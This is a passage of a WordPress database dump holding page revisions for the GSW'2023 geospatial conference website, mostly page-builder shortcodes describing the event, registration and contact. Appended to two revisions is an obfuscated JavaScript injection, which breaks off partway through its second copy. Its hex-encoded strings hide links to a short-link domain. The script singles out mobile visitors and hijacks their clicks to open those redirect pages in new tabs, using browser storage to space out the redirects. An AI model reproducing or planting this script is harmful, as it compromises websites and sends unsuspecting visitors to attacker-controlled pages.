US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:06:08','2022-11-09 15:06:08','',3066,'https://gsw2023.com/?p=3126',0,'revision','',0),
(3127,1,'2022-11-09 15:07:38','2022-11-09 15:07:38','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_size=\"large\" awb_image_background_size=\"contain\" awb_image_background_position=\"150% 150%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"3068\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 